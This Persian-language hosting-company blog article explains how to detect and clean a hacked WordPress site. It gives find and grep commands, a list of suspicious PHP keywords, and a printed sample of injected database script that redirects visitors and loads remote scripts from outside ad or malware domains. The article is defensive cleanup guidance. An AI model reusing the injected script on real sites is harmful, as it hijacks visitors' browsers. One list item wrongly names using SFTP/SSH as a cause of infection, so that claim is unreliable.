آموزش های میزبان هاستابزارامنیتشبکهطراحی و توسعهوردپرس
موضوعات داغ

با وردپرسِ هک شده چه کار کنیم؟

هک شدن سایت، برای هرکسی ممکن است اتفاق بیفتد؛ چون انگیزه هکرها مختلف است! چه سایت‌تان نوپا باشد و چه بزرگ و شناخته شده، ممکن است در معرض خطر هک یا اخاذی قرار بگیرید. در مقاله امرو می‌خواهیم به شما بگوییم که چطور از هک شدن سایت وردپرسی مطلع شوید و چگونه آن را از دست هکرها خارج کنید. نکاتی که در این مقاله می‌گوییم، برای کسانی که سایت وردپرسی دارند بسیار مفید و ضروری است. پس اگر از سیستم مدیریت محتوای وردپرس استفاده می‌کنید، با ما همراه باشید.

علائم وب‌سایت WordPress هک شده چیست؟

۴ تا نشانه اصلی هست که خبر از هک شدن وب‌سایت شما می‌دهند.

۱) Deface شدن

بارزترین نشانه، برای اینکه فهمید وب‌سایت‌تان هک شده، دیفیس شدن است. Deface چیست؟

تا حالا شده وارد سایتی شوید و ببینید که نوشته Hacked By Ninjas؟ یا کلا تم آن عوض شده باشد و اطلاعات آن در دسترس نباشد؟ به این حالت دیفیس شدن سایت گفته می‌شود. هکر برای آنکه خودی نشان دهد، پیامش را در سایت شما به نمایش درمی‌آورد.

۲) دریافت پیام اخطار

در اکثر موارد، کاربران سایت‌های هک شده، پیام اخطاری مبنی بر هک شدن هاست یا تعلیق آن از جانب فراهم‌کننده سرویس (هاستینگ) دریافت می‌کنند. اگر شما هم چنین پیامی دریافت کردید، یعنی سایت‌تان هک شده است.

میزبان هاست سوشال

مثلاً افت ناگهانی ترافیک سایت نشان می‌دهد که احتمالا سایت در Blacklist گوگل یا موتورهای جستجوی دیگر به دلیل بدافزار یا اسپم و… لیست شده است. این موضوع از طریق هاستینگ به شما تذکر خواهد داده شد.

۳) تغییرات عجیب در سایت

در صورتی که هر کدام از نشانه‎‌های زیر را در سایت خود مشاهده کردید، سایت شما هک شده است:

  • در صورتی که سایت شما خودبه‌خود به ناکجا Redirect شود
  • در صورتی که امکان ورود (sign in) به سایت خود را ندارید، ممکن است هکر با اعمال تغییراتی در تنظیمات از ورود شما ممانعت بعمل آورده باشد
  • مسدود کننده تبلیغات (Adblockers) سایت را به دلیل استخراج رمز ارز مسدود کرده است
  • تبلیغات و pop-ups های ناشناس در سایت مشاهده می‌کنید
  • cron job های مشکوک در انتظار اجرا و همچینین فعالیت‌های مشکوک در log سرور اتفاق افتاده است
  • کاراکترهای چینی و ژاپنی یا نامفهوم در سایت می‌بینید
  • ایمیل اسپم از هاست‌تان ارسال می‌شود
  • در صورتی که ترافیک زیادی بر روی سرور وجود ندارد اما منابع پردازشی سرور به شدت درگیر است
حتما بخوانید:  ‫آسیب‌پذیری امنیتی پلاگین Slider Revolution وردپرس و راه‌حل آن

۴) مشاهده تغییرات در فایل‌ها

یکی از راحت‌ترین راه‌ها برای شناسایی سایت هک شده، بررسی تغییرات ایجاد شده در فایل‌های آن است.

برخی از علائم این تغییرات عبارتند از:

  • مشاهده فایل‌های ناشناس در دایرکتوری های wp-admin و wp-includes. (توجه کنید در هر دو این دایرکتوری‌ها به ندرت فایل های جدید اضافه می‌شود.)
  • مشاهده تغییراتی در تم و ابتدا و انتهای فایل‌ها به جهت اعمال redirect
  • مشاهده دامنه‌های جدید و ناشناس در پایگاه داده سایت
  • مشاهده لینک‌های ناشناس در فایل‌های اصلی سایت
  • وجود فایل‌های نامشخص با پسوند .php و یا پلاگین‌های شاخص که تغییراتی در نام آن‌ها اعمال شده است.

چگونه مشکل سایت هک شده را برطرف کنیم؟

خب؛ اگر علائم بالا را داشتید و وب‌سایت‌تان هک شده بود، کارهایی را که در این بخش می‌گوییم انجام دهید.

سرورهای مجازی میزبان هاست

۱) از بکاپ استفاده کنید

اگر قبلاً از اطلاعات‌تان بکاپ یا نسخه پشتیبان تهیه کرده باشید، سر بزنگاه می‌توانید از آن‌ها استفاده کنید و سایت‌تان را بازگردانید.

پس، بکاپ گیری روزانه، هفتگی یا دوره‌ای را جدی بگیرید و بکاپ‌ها را در مکانی خارج از سروری که سایت شما بر روی آن قرار دارد، ذخیره کنید.

همچنین اطمینان حاصل شود که بکاپ گرفته شده شامل فایل‌های اصلی وردپرس، پایگاه داده وردپرس، فایل‌های افزونه‌ها و تم‌ها و فایل .htaccess باشد.

۲) حالت نگهداری یا Maintenance Mode را فعال کنید

توصیه می‌کنیم بعد از مشاهده اقدامات بدخواهانه بر روی سایت، آن را بر روی حالت نگهداری (Maintenance Mode) قرار دهید. با این کار کاربران سایت شما تحت تاثیر هک سایت قرار نخواهند گرفت.

همچنین می‌توانید از افزونه‌هایی مانند Coming Soon استفاده کنید. این افزونه‌ها با نشان دادن پیامی به کاربران، از آشکار شدن هک سایت و ایجاد جو بد روانی، جلوگیری می‌کنند.

اپلیکیشن میزبان هاست

حالت نگهداری یا Maintenance Mode

۳) تمام پسوردهای موجود را تغییر دهید

در صورتی که دسترسی‌تان به سایت قطع نشده، باید تمام پسوردها را در اسرع وقت تغییر دهید. این پسوردها شامل پنل ادمین، پایگاه داده و دیگر حساب‌های کاربری می‌شود. در صورتی که اعضای دیگر تیم شما نیز دسترسی به پنل ادمین دارند، از آن‌ها نیز درخواست کنید پسوردها را تغییر دهند.

همچنین می‌شود تمام حساب‌های کاربری را مجددا احراز هویت کرد. با این کار همه کاربران از سایت خارج (Log Out) شده و نیاز است که مجددا مجازشماری شوند. با این کار pjd می‌شود دسترسی کاربران غیرمجاز را حذف کرد.

۴) افزونه‌های آسیب‌پذیر را بررسی کنید

آسیب‌پذیری‌های افزونه‌های شخص ثالث (Third-party) یکی دیگر از شایع‌ترین دلایل هک سایت‌های وردپرسی است. بد نیست بدانید که علت هک شدن بیشتر از ۵۶% سایت‌های WordPress افزونه‌های آسیب‌پذیر بوده است.

در نتیجه قبل از اینکه اقدام به پاکسازی هاست خود نمایید، اطمینان حاصل کنید که نسخۀ مورد استفادۀ افزونه‌های موجود، فاقد آسیب‌پذیری است. برای بررسی این مورد می‌توانید به wordpress.org/support/forums مراجعه کنید.

میزبان هاست راهکار جامع شبکه و وب
حتما بخوانید:  mount کردن پارتیشن‌های ماشین مجازی KVM

۵) فایل‌ها را با دقت بررسی کنید

برای شناسایی فایل‌های دستکاری شده، کدهای مخرب و بدافزارها، کارهایی را که در این بخش یادتان می‌دهیم، انجام دهید.

فایل‌ها را با دقت بررسی کنید

استفاده از اسکنر بدافزار جهت شناسایی فایل و کدهای مخرب

سایت خود را با یک اسکنر بدافزار (مانند sitecheck.sucuri.net) مورد اسکن قرار دهید. با این کار جزئیات فایل‌های مخرب شناسایی و بررسی می‌شود. همچنین این اسکن می‌تواند به‌صورت دستی انجام شود ولی نیاز به صرف زمان زیادی دارد.

اگر فایل‌های مخرب یا مشکوک شناسایی شد با استفاده از ابزارهای آنلاین (مانند www.base64decode.org) می‌توان محتوای آن را رمزگشایی کرد.

استفاده از دستور find جهت شناسایی تغییرات اخیر

به منظور شناسایی تغییرات فایل‌های هاست خود‌، در صورتی که دسترسی ssh دارید، می توانید از دستور زیر استفاده نمایید:

find . -mtime -2 –ls

این دستور لیست تمام فایل‌های تغییر کرده طی ۲ روز گذشته را نشان می‌دهد. اگر نیاز شد، می‌توانید تعداد روز در این دستور را کم یا زیاد کنید. همچنین دستور find را می‌توان همراه با فرمت base64 ترکیب کرد؛ به صورت زیر:

find . -name “*.php” -exec grep “base64″‘{}’; -print &> hiddencode.txt

مقایسه فایل‌های اصلی WordPress

برای این منظور شما می‌توانید فایل‌های اصلی وردپرس را از سایت wordpress.org دانلود کرده و با بکاپ موجود مقایسه کنید. همچنین می‌توانید از ابزارهای آنلاین مانند diff checker برای شناسایی تفاوت میان دو فایل استفاده کنید.

در صورتی که راه اول را انتخاب کرده‌اید مطمئن شوید که فایل‌های وردپرس دانلود شده مطابق نسخه WordPress شما باشند. در صورت مشاهده لینک یا کدهای مخرب تزریق شده، باید حذف شوند.

به‌علاوه، می‌شود فایل‌ها را با کلمات کلیدی مانند موارد زیر مورد بررسی قرار داد.

eval, exec, strrev, assert, base64, str_rot13, Stripslashes, preg_replace

برای جستجو این کلمات کلیدی در یک شاخه باید از دستور زیر استفاده کنید. (در این مثال کلمه base64 را در مسیر  / مورد جستجو قرار داده‌ایم.)

sudo grep -lir base64 /

بعد از بررسی فایل‌ها، نوبت به پاکسازی آن‌ها می‌رسد. در بخش بعدی این مورد را هم یادتان می‌دهیم.

۶) بدافزارها را از فایل‌ها پاکسازی کنید

فایل‌های وردپرس، نقشۀ سایت و پایگاه داده، ۳ مکانی هستند که باید با دقت و وسواس، پاکسازی یا اگر لازم شد، مجدد نصب شوند.

بدافزارها را از فایل‌ها پاکسازی کنید

پاک‌سازی فایل‌های WordPress

بعد از بررسی گسترده بر روی سایت و هاست خود، موارد کشف شده را لیست کنید؛ فایل‌هایی که تغییر کرده‌اند، آخرین تغییرات بر روی فایل‌ها و کاربران نامعتبر.

فایل‌های اصلی WordPress از قبیل theme files، wp-uploads، The database، wp-contents/uploads، wp-config.php و plugin files باید پاکسازی شوند.

پاک‌سازی فایل Sitemap

یکی دیگر از دلایل هک وردپرس، وجود یک بدافزار در فایل Sitemap.xml است. این فایل به گوگل کمک می‌کند تا صفحات مهم وب‌سایت شناسایی شود. گاهی هکرها در این فایل یک لینک بدافزار را تزریق می‌کنند. بنابراین باید این فایل را بررسی و در صورت وجود لینک مخرب و یا هرچیز غیر معمولی دیگر، آن را حذف کرد.

حتما بخوانید:  ابر هیبریدی

پاک‌سازی پایگاه داده

در پایگاه داده وردپرس، کلیه اطلاعات مربوط به کاربران، صفحات سایت، گواهینامه‌های حساس و غیره نگهداری می‌شود. بنابراین بررسی این فایل به منظور پیدا کردن علت هک، امری به شدت مهم و حیاتی است. شما می‌توانید از یک اسکنر بدافزار به منظور بررسی کدهای تزریق شده در فایل wp_db استفاده کنید.

در صورتی که تمایل به بررسی دستی داشتید، نیاز است تا هر ۱۱ جدول موجود در پایگاه داده را به منظور بررسی علت هک جستجو کنید. کلیه لینک‌ها و iframe ها را بررسی و هر مورد مشکوکی را حذف کنید تا سایت از حالت هک دربیاید.

در کادر زیر یک مثال از کد redirection موجود در فایل پایگاه داده نمایش داده شده است:

<script>
const overlayTranslations = {“en”:{“title”:”Attention!”,”description”:”Click “Allow” to subscribe to notifications and continue working with this website.”}};
const overlay = {“delay”:3000,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow” to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement(‘script’);
s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294”)});
sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294”)});
sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294”)});
sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync=’false’ type=’text/javascript’ src=’//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2′></script><script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=2574011″ async data-cfasync=”false”></script><script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=676630″ async data-cfasync=”false”></script>

نصب مجدد فایل‌ها

اگر سایت مورد نظر به‌شدت به کدهای مخرب آلوده شده است، بهتر است فایل‌ها را حذف و با همتای آن جایگزین کنید. ناگفته نماند که نصب مجدد تنها محدود به حذف فایل‌ها نمی‌شود و نیاز است تا کلیه پلاگین‌ها نیز نصب مجدد شود.

برخی از کاربران به سبب کمبود وقت یا کم توجهی، پلاگین‌های بلااستفاده و منقضی شده را نگهداری می‌کنند. یک هکر نیز از این پلاگین‌ها برای اکسپلویت یک آسیب‌پذیری استفاده می‌کند.

بستر تزریق بدافزار چگونه فراهم می‌شود؟

دنبال کردن قوانین امنیتی ساده، می‌تواند بسیاری از ریسک‌های امنیتی را کاهش دهد. در ادامه دلایلی که امکان دارد سایت شما مورد هدف هکرها قرار ‌گیرد و آلوده ‌شود را نام برده‌ایم؛ اما …

? توصیه می‌کنم برای اطلاعات تکمیلی، حتماً به مقاله ۸ نکته مهم برای افزایش امنیت سایت مراجعه کنید.

  • به‌روز نبودن نسخه وردپرس
  • هاستینگ بر روی سرورهای اشتراکی نامطمئن
  • استفاده از نام کاربری و رمز عبور ضعیف
  • مجوزهای فایلی نامناسب
  • دسترسی حفاظت نشده به دایرکتوری wp_admin
  • تم‌ها و افزونه‌های منقضی شده
  • استفاده از SFTP/SSH به جای FTP

جمع‌بندی

امیدواریم هیچ‌وقت وب‌سایت‌تان هک نشود و اطلاعات‌تان دست افراد سودجو نیفتد! اما اگر هک شدید، ه دستورالعمل‌های گفته شده در این مقاله عمل کنید، تا سریع‌تر جلوی ضرر را بگیرید.

امتیاز این نوشته

امتیاز

امتیاز کاربران: 4.38 ( 4 رای)

مشاهده بیشتر

نوشته های مشابه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

دکمه بازگشت به بالا